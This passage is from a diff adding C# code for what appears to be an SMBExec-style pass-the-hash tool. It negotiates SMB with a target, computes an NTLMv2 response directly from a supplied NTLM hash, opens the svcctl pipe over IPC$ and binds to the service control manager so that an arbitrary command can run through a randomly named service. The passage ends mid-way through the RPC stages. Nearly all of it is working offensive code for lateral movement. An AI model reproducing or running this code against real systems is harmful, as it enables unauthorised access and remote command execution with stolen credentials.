+                if (debug) { output.AppendLine("AdminCheck is false"); }
+                if (!string.IsNullOrEmpty(command))
+                {
+                    if (debug) { output.AppendLine("String is not empty"); }
+                    SMB_execute = true;
+                }
+            }
+
+            TcpClient SMBClient = new TcpClient();
+            SMBClient.Client.ReceiveTimeout = 60000;
+
+            try
+            {
+                SMBClient.Connect(target, 445);
+            }
+            catch (Exception e)
+            {
+                output.AppendLine("Could not connect to target");
+            }
+
+            if (SMBClient.Connected)
+            {
+                if (debug) { output.AppendLine(String.Format("Connected to {0}", target)); }
+                NetworkStream SMBClientStream = SMBClient.GetStream();
+                SMBClientReceive = new byte[1024];
+                string SMBClientStage = "NegotiateSMB";
+
+                while (SMBClientStage != "exit")
+                {
+                    if (debug) { output.AppendLine(String.Format("Current Stage: {0}", SMBClientStage)); }
+                    switch (SMBClientStage)
+                    {
+                        case "NegotiateSMB":
+                            {
+                                packet_SMB_header = new OrderedDictionary();
+                                packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
+                                OrderedDictionary packet_SMB_data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
+                                byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                SMB_client_send = new byte[NetBIOS_session_service.Length + SMB_header.Length + SMB_data.Length];
+                                Buffer.BlockCopy(NetBIOS_session_service, 0, SMB_client_send, 0, NetBIOS_session_service.Length);
+                                Buffer.BlockCopy(SMB_header, 0, SMB_client_send, NetBIOS_session_service.Length, SMB_header.Length);
+                                Buffer.BlockCopy(SMB_data, 0, SMB_client_send, NetBIOS_session_service.Length + SMB_header.Length, SMB_data.Length);
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
+                                {
+                                    ForceSMB1 = true;
+                                    //SMB_version = "SMB1";
+                                    if (debug) { output.AppendLine("Using SMB1"); }
+                                    SMBClientStage = "NTLMSSPNegotiate";
+                                    if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
+                                    {
+                                        if (debug) { output.AppendLine("SMB Signing is Enabled"); }
+                                        SMB_signing = true;
+                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
+                                        SMB_negotiate_flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
+
+                                    }
+                                    else
+                                    {
+                                        if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
+                                        SMB_signing = false;
+                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
+                                        SMB_negotiate_flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
+
+                                    }
+                                }
+                                else
+                                {
+                                    if (debug) { output.AppendLine("Using SMB2"); }
+                                    SMBClientStage = "NegotiateSMB2";
+                                    if (BitConverter.ToString(new byte[] { SMBClientReceive[70] }) == "03")
+                                    {
+                                        if (debug) { output.AppendLine("SMB Signing is Enabled"); }
+                                        SMB_signing = true;
+                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
+                                        SMB_negotiate_flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
+                                    }
+                                    else
+                                    {
+                                        if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
+                                        SMB_signing = false;
+                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
+                                        SMB_negotiate_flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
+
+                                    }
+                                }
+                            }
+                            break;
+                        case "NegotiateSMB2":
+                            {
+                                SMB2_message_ID = 1;
+                                packet_SMB2_header = new OrderedDictionary();
+                                SMB2_tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
+                                SMB_session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+                                packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                OrderedDictionary packet_SMB2_data = SMBExec.SMB2NegotiateProtocolRequest();
+                                byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                SMBClientStage = "NTLMSSPNegotiate";
+
+                            }
+                            break;
+                        case "NTLMSSPNegotiate":
+                            {
+                                SMB_client_send = null;
+                                if (ForceSMB1)
+                                {
+                                    packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
+
+                                    if (SMB_signing)
+                                    {
+                                        packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                    }
+                                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPNegotiate(SMB_negotiate_flags, null);
+                                    byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
+                                    OrderedDictionary packet_SMB_data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_negotiate);
+                                    byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                }
+                                else
+                                {
+                                    packet_SMB2_header = new OrderedDictionary();
+                                    SMB2_message_ID += 1;
+                                    packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPNegotiate(SMB_negotiate_flags, null); //need to see if packet_version works? Maybe this is just left over?
+                                    byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
+                                    OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_negotiate);
+                                    byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+
+                                }
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                SMBClientStage = "exit";
+                            }
+                            break;
+
+                    }
+                }
+                if (debug) { output.AppendLine(String.Format("Authenticating to {0}", target)); }
+                string SMB_NTLSSP = BitConverter.ToString(SMBClientReceive);
+                SMB_NTLSSP = SMB_NTLSSP.Replace("-", "");
+                int SMB_NTLMSSP_Index = SMB_NTLSSP.IndexOf("4E544C4D53535000");
+                int SMB_NTLMSSP_bytes_index = SMB_NTLMSSP_Index / 2;
+                int SMB_domain_length = Utilities.DataLength(SMB_NTLMSSP_bytes_index + 12, SMBClientReceive);
+                int SMB_target_length = Utilities.DataLength(SMB_NTLMSSP_bytes_index + 40, SMBClientReceive);
+                SMB_session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
+                byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_bytes_index + 24, SMB_NTLMSSP_bytes_index + 31);
+                byte[] SMB_target_details = null;
+                SMB_target_details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_bytes_index + 56 + SMB_domain_length), (SMB_NTLMSSP_bytes_index + 55 + SMB_domain_length + SMB_target_length));
+                byte[] SMB_target_time_bytes = Utilities.GetByteRange(SMB_target_details, SMB_target_details.Length - 12, SMB_target_details.Length - 5);
+                string hash2 = "";
+                for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
+                byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
+                string[] hash_string_array = hash2.Split('-');
+                string auth_hostname = Environment.MachineName;
+                byte[] auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
+                byte[] auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
+                byte[] auth_username_bytes = Encoding.Unicode.GetBytes(username);
+                byte[] auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
+                auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
+                byte[] auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
+                auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
+                byte[] auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
+                auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
+                byte[] auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                byte[] auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
+                byte[] auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
+                byte[] auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
+                byte[] auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                HMACMD5 HMAC_MD5 = new HMACMD5();
+                HMAC_MD5.Key = NTLM_hash_bytes;
+                string username_and_target = username.ToUpper();
+                byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
+                byte[] username_and_target_bytes = null;
+                username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                Random r = new Random();
+                byte[] client_challenge_bytes = new byte[8];
+                r.NextBytes(client_challenge_bytes);
+
+
+
+                byte[] security_blob_bytes = null;
+                security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, SMB_target_time_bytes);
+                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
+                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, SMB_target_details);
+                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+                byte[] server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(SMB_NTLM_challenge, security_blob_bytes);
+                HMAC_MD5.Key = NTLMv2_hash;
+                byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
+                if (SMB_signing)
+                {
+                    byte[] session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
+                    session_key = session_base_key;
+                    HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                    HMAC_SHA256.Key = session_key;
+                }
+
+                NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
+                NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
+                byte[] SMB_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
+                byte[] NTLMSSP_response = null;
+                NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_length);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_offset);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_negotiate_flags);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
+
+
+                if (ForceSMB1)
+                {
+                    packet_SMB_header = new OrderedDictionary();
+                    SMB_user_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
+                    packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
+
+                    if (SMB_signing)
+                    {
+                        packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                    }
+
+                    packet_SMB_header["SMBHeader_UserID"] = SMB_user_ID;
+                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
+                    byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
+                    OrderedDictionary packet_SMB_data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_negotiate);
+                    byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+
+                }
+                else
+                {
+                    SMB2_message_ID += 1;
+                    packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                    OrderedDictionary packet_NTLMSSP_auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
+                    byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                    byte[] NTLMSSP_auth = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_auth);
+                    OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_auth);
+                    byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                }
+
+
+
+                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+
+                if (ForceSMB1)
+                {
+                    if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 9, 12)) == "00-00-00-00")
+                    {
+                        if (debug) { output.AppendLine("Authentication Successful"); }
+                        login_successful = true;
+                    }
+                    else
+                    {
+                        output.AppendLine("Unable to authenticate to target.");
+                        return output.ToString();
+                    }
+                }
+                else
+                {
+                    if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) == "00-00-00-00")
+                    {
+                        if (debug) { output.AppendLine("Authentication Successful"); }
+                        login_successful = true;
+                    }
+                    else
+                    {
+                        output.AppendLine("Unable to Authenticate to target.");
+                        return output.ToString();
+                    }
+                }
+
+                if (debug) { output.AppendLine(String.Format("Login Status: {0}", login_successful)); }
+                if (login_successful)
+                {
+                    byte[] SMBExec_command;
+                    byte[] SMB_path_bytes;
+                    string SMB_Path = "\\\\" + target + "\\IPC$";
+                    if (ForceSMB1)
+                    {
+                        SMB_path_bytes = Utilities.CombineByteArray(Encoding.UTF8.GetBytes(SMB_Path), new byte[] { 0x00 });
+                    }
+                    else
+                    {
+                        SMB_path_bytes = Encoding.Unicode.GetBytes(SMB_Path);
+                    }
+
+                    byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
+                    byte[] SMB_service_bytes;
+                    string SMB_service = null;
+                    if (string.IsNullOrEmpty(ServiceName))
+                    {
+                        const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+                        var rand = new Random();
+                        SMB_service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
+                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service);
+                        SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                    }
+                    else
+                    {
+                        SMB_service = ServiceName;
+                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service);
+                        if (Convert.ToBoolean(SMB_service.Length % 2))
+                        {
+                            SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00 });
+                        }
+                        else
+                        {
+                            SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                        }
+                    }
+                    if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_service)); }
+                    byte[] SMB_service_length = BitConverter.GetBytes(SMB_service.Length + 1);
+
+                    if (ComSpec)
+                    {
+                        if (debug) { output.AppendLine("Appending %COMSPEC% /C"); }
+
+                        command = "%COMSPEC% /C \"" + command + "\"";
+                    }
+
+                    byte[] commandBytes = Encoding.UTF8.GetBytes(command);
+                    List<byte> SMBExec_command_list = new List<byte>();
+                    foreach (byte commandByte in commandBytes)
+                    {
+                        SMBExec_command_list.Add(commandByte);
+                        SMBExec_command_list.Add(0x00);
+
+                    }
+                    byte[] SMBExec_command_init = SMBExec_command_list.ToArray();
+
+                    if (Convert.ToBoolean(command.Length % 2))
+                    {
+                        SMBExec_command = Utilities.CombineByteArray(SMBExec_command_init, new byte[] { 0x00, 0x00 });
+                    }
+                    else
+                    {
+                        SMBExec_command = Utilities.CombineByteArray(SMBExec_command_init, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                    }
+                    byte[] SMBExec_command_length_bytes = BitConverter.GetBytes(SMBExec_command.Length / 2);
+                    int SMB_split_index = 4256;
+                    int SMB_signing_counter = 0;
+                    byte[] SMB_tree_ID = new byte[2];
+                    string SMB_client_stage_next = "";
+                    if (ForceSMB1)
+                    {
+                        SMBClientStage = "TreeConnectAndXRequest";
+                        while (SMBClientStage != "exit" && SMBExec_failed == false)
+                        {
+                            if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
+                            switch (SMBClientStage)
+                            {
+                                case "TreeConnectAndXRequest":
+                                    {
+                                        packet_SMB_header = new OrderedDictionary();
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter = 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBTreeConnectAndXRequest(SMB_path_bytes);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_Session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_Session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_service);
+
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "CreateAndXRequest";
+                                    }
+                                    break;
+                                case "CreateAndXRequest":
+                                    {
+                                        SMB_named_pipe_bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
+                                        SMB_tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBNTCreateAndXRequest(SMB_named_pipe_bytes);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_Session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_Session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_service);
+
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "RPCBind";
+
+                                    }
+                                    break;
+                                case "RPCBind":
+                                    {
+                                        SMB_FID = Utilities.GetByteRange(SMBClientReceive, 42, 43);
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadAndXRequest";
+                                        SMB_client_stage_next = "OpenSCManagerW";
+                                    }
+                                    break;
+                                case "ReadAndXRequest":
+                                    {
+                                        Thread.Sleep(sleep * 1000);
